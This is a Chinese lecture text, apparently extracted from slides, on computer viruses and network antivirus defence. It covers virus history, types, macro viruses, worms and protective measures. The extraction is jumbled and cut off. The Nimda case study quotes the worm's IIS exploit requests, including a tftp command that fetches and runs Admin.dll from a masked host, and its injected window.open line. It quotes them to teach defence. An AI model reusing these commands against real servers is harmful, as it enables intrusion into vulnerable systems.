第3章網(wǎng)絡防病毒

1、目錄 計算機病毒的定義 病毒發(fā)展史 計算機病毒的特點 病毒分類 計算機病毒的發(fā)展趨勢 病毒實例 病毒的防護網(wǎng)絡安全防護體系構架網(wǎng)絡安全評估安全防護網(wǎng)絡安全服務系統(tǒng)漏洞掃描網(wǎng)絡管理評估病毒防護體系網(wǎng)絡監(jiān)控數(shù)據(jù)保密網(wǎng)絡訪問控制應急服務體系安全技術培訓數(shù)據(jù)恢復網(wǎng)絡安全防護體系構架 1994年2月18日，我國正式頒布實施了中華人民共和國計算機信息系統(tǒng)安全保護條例，在條例第二十八條中明確指出： “指編制或者在計算機程序中插入的破壞破壞 計算機功能或者破壞破壞數(shù)據(jù)，影響計算機使用并且能夠自我復制自我復制 的一組計算機指令計算機指令 或者程序代碼程序代碼 ”。病毒：VirusVirus一、計算機病毒的定義二

2、、病毒發(fā)展史1、計算機病毒的產(chǎn)生的思想基礎和病毒發(fā)展簡介2、實驗室中產(chǎn)生病毒的祖先（磁芯大戰(zhàn)）3、計算機病毒的出現(xiàn) 4、我國計算機病毒的出現(xiàn) 病毒的產(chǎn)生原因（1）編制人員出于一種炫耀和顯示自己能力的目的（2）某些軟件作者出于版權保護的目的而編制 （3）出于某種報復目的或惡作劇而編寫病毒 （4）出于政治、戰(zhàn)爭的需要二、病毒的發(fā)展歷程二、病毒的發(fā)展歷程 1. DOS引導階段 2. DOS可執(zhí)行階段 3. 伴隨階段 4. 多形階段 5. 生成器、變體機階段 6. 網(wǎng)絡、蠕蟲階段 7. 視窗階段 8. 宏病毒階段 9. 郵件病毒階段 10. 手持移動設備病毒階段 時代劃分時間總結第一代：傳統(tǒng)病毒198

3、6-1989DOS引導階段DOS可執(zhí)行階段第二代：混合病毒(超級病毒)1989-1991伴隨、批次型階段第三代：多態(tài)性病毒1992-1995幽靈、多形階段生成器、變體機階段第四代：90年代中后宏病毒階段網(wǎng)絡、蠕蟲階段二、病毒的發(fā)展歷程二、病毒的發(fā)展歷程時間名稱事件1986Brain 第一個病毒（軟盤引導）1987黑色星期五病毒第一大規(guī)模爆發(fā)1988.11.2蠕蟲病毒 第一個蠕蟲計算機病毒 1990.1“4096”發(fā)現(xiàn)首例隱蔽型病毒，破壞數(shù)據(jù)1991 病毒攻擊應用于戰(zhàn)爭 1991米開朗基羅第一個格式化硬盤的開機型病毒1992VCL- Virus Creation Laboratory病毒生產(chǎn)工具

4、在美國傳播時間名稱事件1992年9月首例Windows病毒1995FAT病毒、幽靈、變形金剛多態(tài)性（基于）windows）1997宏病毒 傳播方式增加（郵件等）1998CIH發(fā)現(xiàn)破壞計算機硬件病毒1999 Mellisahappy99郵件病毒2000紅色代碼黑客型病毒2001Nimda集中了所有蠕蟲傳播途徑2002SQLSPIDA.B第一個攻擊SQL服務器2003SQL_slammer利用SQL server數(shù)據(jù)庫的漏洞2003.8.11沖擊波集中了所有蠕蟲傳播途徑1.紅色結束符（Script.RedLof）2.愛情后門（Worm.LovGate）3.FUNLOVE(PE_FunLove) 4

5、.未知郵件病毒5.尼姆達（Worm.Nimda） 6.求職信（Worm.Klez）7.CIH(Win32.Cih) 8、WYX(Wyx)9.勞拉（Win32.Xorala） 10.硬盤殺手（Worm.OpaSoft）11.垃圾桶（Worm.Lentin） 12.大無極（Worm.SoBig） 2003上半年破壞范圍最廣的12個病毒計算機病毒的危害計算機病毒的危害v1、計算機病毒造成巨大的社會經(jīng)濟損失v2、影響政府職能部門正常工作的開展v3、計算機病毒被賦予越來越多的政治意義v4、利用計算機病毒犯罪現(xiàn)象越來越嚴重病毒帶來的威脅 近年來全球重大電腦病毒疫情及損失的統(tǒng)計圖：三、計算機病毒的特征三、計

6、算機病毒的特征 破壞性 傳染性 隱蔽性 寄生性 可觸發(fā)性可執(zhí)行性計算機病毒有哪些種類？依據(jù)不同的分類標準，計算機病毒可以做不同的歸類。常見的分類標準有：1. 根據(jù)病毒依附的操作系統(tǒng)2. 根據(jù)病毒的攻擊方式3. 根據(jù)病毒的傳播媒介4. 根據(jù)病毒的傳播途徑病毒攻擊的操作系統(tǒng) Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系統(tǒng)病毒攻擊的操作系統(tǒng)圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)DOSDOS43%43%UnixUnix3%3%OtherOther1%1%WindowWindows

7、 s53%53%DOSDOSWindowsWindowsUnixUnixOtherOther病毒的傳播媒介存儲介質網(wǎng)絡1. 郵件(SoBig)2. 網(wǎng)頁(RedLof)3. 局域網(wǎng)(Funlove)4. 遠程攻擊(Blaster)5. 網(wǎng)絡下載病毒網(wǎng)絡傳播方式圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)郵件郵件47%47%局域網(wǎng)局域網(wǎng)9%9%遠程攻遠程攻擊擊4%4%網(wǎng)頁網(wǎng)頁40%郵件郵件網(wǎng)頁網(wǎng)頁局域網(wǎng)局域網(wǎng)遠程攻擊遠程攻擊病毒的傳播和感染對象感染引導區(qū)感染文件可執(zhí)行文件OFFICE宏網(wǎng)頁腳本（ Java小程序和ActiveX控件）網(wǎng)絡蠕蟲網(wǎng)絡木馬破壞程序其他惡意程序引導型病毒 文件型病毒 文件型病毒的特點

8、是附著于正常程序文件，成為程序文件的一個外殼或部件。 文件型病毒主要以感染文件擴展名為.com、.exe和.bat等可執(zhí)行程序為主。 大多數(shù)的文件型病毒都會把它們自己的代碼復制到其宿主文件的開頭或結尾處。 紅色代碼 1() 計算機病毒引起是異常情況計算機病毒引起是異常情況 計算機系統(tǒng)運行速度明顯降低 系統(tǒng)容易死機 文件改變、破壞 磁盤空間迅速減少 內存不足 系統(tǒng)異常頻繁重啟動 頻繁產(chǎn)生錯誤信息常見DOS病毒分析1引導記錄病毒 （1）引導型病毒的傳播、破壞過程 （2）引導型病毒實例：小球病毒 2文件型病毒（1）文件型病毒的類型 （2）

9、文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染 宏病毒的行為和特征 宏病毒是一種新形態(tài)的計算機病毒，也是一種跨平臺式計算機病毒?？梢栽赪indows、Windows 95/98/NT、OS/2、Macintosh 等操作系統(tǒng)上執(zhí)行病毒行為。 宏病毒的主要特征如下： 1）宏病毒會感染.DOC文檔和.DOT模板文件。 2）宏病毒的傳染通常是Word在打開一個帶宏病毒的文檔或模板時，激活宏病毒。 3）多數(shù)宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自動宏，通過這些自動宏病毒取得文檔（模板）操作權。 4）宏病毒中

10、總是含有對文檔讀寫操作的宏命令。5）宏病毒在.DOC文檔、.DOT模板中以BFF（Binary File Format）格式存放，這是一種加密壓縮格式，每個Word版本格式可能不兼容。6）宏病毒具有兼容性。 宏病毒的特點 1傳播極快 2制作、變種方便 3破壞可能性極大 宏病毒的防治和清除方法 Word宏病毒，是近年來被人們談論得最多的一種計算機病毒。與那些用復雜的計算機編程語言編制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病毒的編制、發(fā)作過程之后，即使是普通的計算機用戶，不借助任何殺毒軟件，就可以較好地對其進行防冶。 1. 查看“可疑”的宏 2按使用習慣編制宏 3防備Autoxxx

11、x宏 4小心使用外來的Word文檔 5使用選項“Prompt to Save Normal Template” （工具-選項-保存）6查看宏代碼并刪除 7. 將文檔存儲為RTF格式 8設置Normal.dot的只讀屬性 9 Normal.dot的密碼保護 10使用OFFICE 的報警設置 網(wǎng)絡化病毒的特點 網(wǎng)絡化：傳播速度快、爆發(fā)速度快、面廣 隱蔽化：具有欺騙性（加密） 多平臺、多種語言 新方式：與黑客、特洛伊木馬相結合 多途徑： 攻擊反病毒軟件 變化快（變種） 清除難度大 破壞性強 蠕蟲病毒 通過網(wǎng)絡傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征，

12、如不利用文件寄生（有的只存在于內存中）,對網(wǎng)絡造成拒絕服務，以及和黑客技術相結合等等。蠕蟲病毒與其他病毒的區(qū)別普通病毒蠕蟲病毒存在形式 寄存文件獨立程序傳染機制宿主程序運行主動攻擊傳染目標本地文件網(wǎng)絡計算機蠕蟲病毒的特點 破壞性強 傳染方式多 一種是針對企業(yè)的局域網(wǎng)，主要通過系統(tǒng)漏洞；另外一種是針對個人用戶的, 主要通過電子郵件,惡意網(wǎng)頁形式迅速傳播的蠕蟲病毒。 傳播速度快 清除難度大 實例：2003蠕蟲王 病毒病毒實例實例NimdaNimda及解決方案之一及解決方案之一感染 Win 95/98/NT/2000 系統(tǒng)1.通過email 在internet臨時文件夾中讀取所有htm， h t m

13、 l 文 件 并 從 中 提 取 e m a i l 地 址 ，從信箱讀取email并從中提取SMTP服務器，然后發(fā)送readme.eml。NimdaNimda-2.利用 IIS、IE 的安全漏洞 CodeRedII會在IIS的幾個可執(zhí)行目錄下放置root.exeNimda首先在udp/69上啟動一個tftp服務器然后會作以下掃描： GET /scripts/root.exe?/c+dir HTTP/1.0GET /MSADC/root.exe?/c+dir HTTP/1.0GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0GET /d/winnt/sy

14、stem32/cmd.exe?/c+dir HTTP/1.0一 旦 發(fā) 現(xiàn) 有 弱 點 的 系 統(tǒng) 就 使 用 類 似 下 面 的 命 令GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx G E T A d m i n . d l l H T T P / 1 . 0把文件傳到主機上去，然后再GET /scripts/Admin.dll HTTP/1.0 NimdaNimda- - 3.通過WWW服務 在所有文件名中包含default/index/main/readme并且擴展名為htm/html/asp的文件所在目錄中創(chuàng)建readme.eml，并

15、在文件末加上下面這一行window.open(readme.eml, null, resizable=no,top=6000,left=6000)也就是說如果一臺web服務器被感染了，那么大部分訪問過此服務器的機器都會被感染。 NimdaNimda- - 4.通過局域網(wǎng)的共享 Nimda會搜索本地的共享目錄中包含doc文件的目錄，一但找到，就會把自身復制到目錄中命名為riched20.dll 病毒病毒實例實例NimdaNimda及解決方案及解決方案首先對網(wǎng)絡中的工作站進行全面清查對已感染的工作站進行徹底的殺毒，然后對已染毒的服務器殺毒以保證整個網(wǎng)絡系統(tǒng)是干凈的；對網(wǎng)絡中的服務器及工作站進行軟件

16、升級等一系列后續(xù)工程，杜絕再次染毒打微軟IIS、IE的補丁最后著重對服務器進行本地安全策略的設置，做好防范工作，做到即使服務器再次中毒也不能影響整個服務器的正常工作及整個網(wǎng)絡系統(tǒng)的正常運轉。反病毒技術簡述計算機病毒診斷技術計算機病毒診斷技術 1校驗和法診斷 2掃描法診斷 3行為監(jiān)測法診斷 4分析法診斷五、病毒的預防措施 安裝防病毒軟件 定期升級防病毒軟件 不隨便打開不明來源 的郵件附件 盡量減少其他人使用你的計算機 及時打系統(tǒng)補丁 從外面獲取數(shù)據(jù)先檢察 建立系統(tǒng)恢復盤 定期備份文件 綜合各種防病毒技術STOP!服務器端防毒客戶端防毒防毒防毒集中管理器集中管理器STOP!STOP!Mail Se

17、rverSTOP!全方位的網(wǎng)絡全方位的網(wǎng)絡病毒防護體系病毒防護體系STOP!Meb Server File ServerSTOP!網(wǎng)絡病毒的特點及傳播方式網(wǎng)絡病毒的特點 網(wǎng)絡病毒的傳播方式 v 全網(wǎng)統(tǒng)一配置防毒策略。v 全網(wǎng)統(tǒng)一查殺病毒,沒有死角。v 全網(wǎng)統(tǒng)一升級版本統(tǒng)一。v 全網(wǎng)防毒狀況一目了然。v 跨平臺技術，全方位防病毒v 全網(wǎng)防毒工作輕松簡單：自動安裝、自動維護、自動更新單機版與網(wǎng)絡版的區(qū)別單機防毒網(wǎng)絡防毒網(wǎng)絡防毒選擇防毒軟件的標準選擇防毒軟件的標準 “高偵測率”是基本條件， “容易管理”是基本要求， 未知病毒“隔離政策”是關鍵。 病毒處理功能特色指標（高偵測率）v未知病毒檢測能力、未知病毒清除能力 v壓縮文件查毒（不限層數(shù)）、壓縮文件清毒（不限層數(shù)） v打包文件查毒（不限層數(shù)）、打包文件清毒（不限層數(shù)） v內存查毒、內存清毒、運行文件清毒 v郵件接收檢測、郵件發(fā)送檢